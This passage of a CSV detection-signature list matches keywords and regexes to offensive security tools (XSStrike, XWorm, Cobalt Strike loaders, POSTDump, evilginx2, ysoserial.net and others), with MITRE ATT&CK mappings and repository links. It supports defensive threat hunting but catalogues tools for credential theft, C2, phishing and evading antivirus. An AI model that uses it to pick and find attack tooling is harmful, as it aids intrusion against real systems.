TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*XSStrike*",".{0,1000}XSStrike.{0,1000}","offensive_tool_keyword","XSStrike","Advanced XSS detection and exploitation suite.","T1189","TA0001","N/A","N/A","Exploitation tools","https://github.com/UltimateHackers/XSStrike","1","0","N/A","N/A","10","12717","1843","2024-03-22T10:38:50Z","2017-06-26T07:24:44Z" "*xsukax-Wordlist-All.7z*",".{0,1000}xsukax\-Wordlist\-All\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*xvt-void/EnableAllTokenPrivs*",".{0,1000}xvt\-void\/EnableAllTokenPrivs.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","1","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*XWorm_RAT_V2._1.data.*",".{0,1000}XWorm_RAT_V2\._1\.data\..{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*XWorm-v5-Remote-Access-Tool*",".{0,1000}XWorm\-v5\-Remote\-Access\-Tool.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","1","N/A","10","1","21","10","2023-10-03T01:34:12Z","2023-10-03T01:27:37Z" "*XXEinjector*",".{0,1000}XXEinjector.{0,1000}","offensive_tool_keyword","XXEinjector","XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications.","T1573.001 - T1573.002 - T1574","TA0007 - ","N/A","N/A","Web Attacks","https://github.com/enjoiz/XXEinjector","1","1","N/A","10","10","1436","304","2020-08-27T12:33:26Z","2015-05-16T10:56:14Z" "*xxePayloads.ini*",".{0,1000}xxePayloads\.ini.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*XX-PHISHING-LINK-XX*",".{0,1000}XX\-PHISHING\-LINK\-XX.{0,1000}","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","10","10","2726","467","2024-01-26T05:20:18Z","2022-03-15T16:51:39Z" "*X-YSOSERIAL-NET*",".{0,1000}X\-YSOSERIAL\-NET.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*xZF7fvaGD6p2yeLyf9i7O9gBBHk05B0u*",".{0,1000}xZF7fvaGD6p2yeLyf9i7O9gBBHk05B0u.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*xzfbmR6MskR8J6Zr58RrhMc325kejLJE*",".{0,1000}xzfbmR6MskR8J6Zr58RrhMc325kejLJE.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*Y29iYWx0c3RyaWtl*",".{0,1000}Y29iYWx0c3RyaWtl.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Y2F0Y2hldHVtYm90aWZ5b3VjYW4-*",".{0,1000}Y2F0Y2hldHVtYm90aWZ5b3VjYW4\-.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*yanncam/ShuckNT*",".{0,1000}yanncam\/ShuckNT.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","60","9","2023-10-11T13:50:11Z","2023-01-27T07:52:47Z" "*YaraFilters*lsassdump.yar*",".{0,1000}YaraFilters.{0,1000}lsassdump\.yar.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*yarrick/iodine*",".{0,1000}yarrick\/iodine.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","1","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*yasserbdj96/hiphp*",".{0,1000}yasserbdj96\/hiphp.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*yasserjanah/CVE-2020-5902*",".{0,1000}yasserjanah\/CVE\-2020\-5902.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","1","N/A","N/A","1","40","14","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" "*YaWNdpwplLwycqWQDCyruhAFsYjWjnBA*",".{0,1000}YaWNdpwplLwycqWQDCyruhAFsYjWjnBA.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","767","224","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*Yaxser/Backstab*",".{0,1000}Yaxser\/Backstab.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1309","231","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*Yay! No SYSMON here!*",".{0,1000}Yay!\sNo\sSYSMON\shere!.{0,1000}","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","0","N/A","N/A","1","84","16","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" "*yck1509/ConfuserEx*",".{0,1000}yck1509\/ConfuserEx.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","1","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*YDHCUI/csload.net*",".{0,1000}YDHCUI\/csload\.net.{0,1000}","offensive_tool_keyword","cobaltstrike","A cobaltstrike shellcode loader - past domestic mainstream antivirus software","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/csload.net","1","1","N/A","10","10","122","14","2021-05-21T02:36:03Z","2021-05-20T08:24:16Z" "*YDHCUI/manjusaka*",".{0,1000}YDHCUI\/manjusaka.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","747","140","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*yeelight_discover.py*",".{0,1000}yeelight_discover\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1952","1596","2024-01-11T16:11:28Z","2021-01-07T16:11:52Z" "*yehia-mamdouh/Shell3er*",".{0,1000}yehia\-mamdouh\/Shell3er.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","1","N/A","9","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*yehia-mamdouh/var0xshell*",".{0,1000}yehia\-mamdouh\/var0xshell.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","1","N/A","8","10","3","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z" "*Yh0Js82rIfFEbS6pR7oUkN0Use54pIZBa3fpYprAMuURNrZZGc6cM8dc+AC*",".{0,1000}Yh0Js82rIfFEbS6pR7oUkN0Use54pIZBa3fpYprAMuURNrZZGc6cM8dc\+AC.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1344","253","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" "*Yml0c3kubWl0LmVkdQ==*",".{0,1000}Yml0c3kubWl0LmVkdQ\=\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*YmpwZW5uaXNhbmF3ZXNvbWVmaWdodGVy*",".{0,1000}YmpwZW5uaXNhbmF3ZXNvbWVmaWdodGVy.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*YmxvY2s9MTAw*",".{0,1000}YmxvY2s9MTAw.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*yogeshojha/rengine*",".{0,1000}yogeshojha\/rengine.{0,1000}","offensive_tool_keyword","rengine","reNgine is an automated reconnaissance framework for web applications with a focus on highly configurable streamlined recon process via Engines recon data correlation and organization continuous monitoring backed by a database and simple yet intuitive User Interface. reNgine makes it easy for penetration testers to gather reconnaissance with","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/yogeshojha/rengine","1","1","N/A","N/A","10","6762","1047","2024-04-30T22:17:19Z","2020-05-03T12:13:12Z" "*yolAbejyiejuvnup=Evjtgvsh5okmkAvj*",".{0,1000}yolAbejyiejuvnup\=Evjtgvsh5okmkAvj.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: Elastic Security - link: https://raw.githubusercontent.com/elastic/protections-artifacts/main/yara/rules/Linux_Trojan_XZBackdoor.yar","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","rule author: Elastic Security - link: https://raw.githubusercontent.com/elastic/protections-artifacts/main/yara/rules/Linux_Trojan_XZBackdoor.yar","10","10","N/A","N/A","N/A","N/A" "*YOLOP0wn/POSTDump*",".{0,1000}YOLOP0wn\/POSTDump.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*YOLOP0wn/POSTDump*",".{0,1000}YOLOP0wn\/POSTDump.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*YOLOP0wn/POSTDump*",".{0,1000}YOLOP0wn\/POSTDump.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*You are trying to target a User Group Policy Object while running the embedded SMB server*",".{0,1000}You\sare\strying\sto\starget\sa\sUser\sGroup\sPolicy\sObject\swhile\srunning\sthe\sembedded\sSMB\sserver.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*You can execute commands in this shell :D*",".{0,1000}You\scan\sexecute\scommands\sin\sthis\sshell\s\:D.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*you cannot run the RogueOxidResolver on 127.0.0.1*",".{0,1000}you\scannot\srun\sthe\sRogueOxidResolver\son\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*You do not have sufficient permission to hide the scheduled task*",".{0,1000}You\sdo\snot\shave\ssufficient\spermission\sto\shide\sthe\sscheduled\stask.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","9","4","311","41","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" "*you need to provide the path to directory where your phishlets are stored:*",".{0,1000}you\sneed\sto\sprovide\sthe\spath\sto\sdirectory\swhere\syour\sphishlets\sare\sstored\:.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*You_spin_me__round.ino*",".{0,1000}You_spin_me__round\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*youcantpatchthis*",".{0,1000}youcantpatchthis.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","0","N/A","10","10","107","25","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" "*youhacker55/PayGen*",".{0,1000}youhacker55\/PayGen.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Your Moms Smart Vibrator*",".{0,1000}Your\sMoms\sSmart\sVibrator.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","user-agent","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*YOUR_FILES_ARE_ENCRYPTED.HTML*",".{0,1000}YOUR_FILES_ARE_ENCRYPTED\.HTML.{0,1000}","offensive_tool_keyword","SunCrypt","SunCrypt ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#yara","10","3","261","38","2024-05-01T19:21:20Z","2021-07-28T21:00:52Z" "*Yourman.sh Mini Shell*",".{0,1000}Yourman\.sh\sMini\sShell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*ysoserial -*",".{0,1000}ysoserial\s\-.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*ysoserial-*.zip",".{0,1000}ysoserial\-.{0,1000}\.zip","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*ysoserial.exe *",".{0,1000}ysoserial\.exe\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*ysoserial.exe*",".{0,1000}ysoserial\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*ysoserial.exe*",".{0,1000}ysoserial\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","112","35","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*ysoserial.net*",".{0,1000}ysoserial\.net.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation 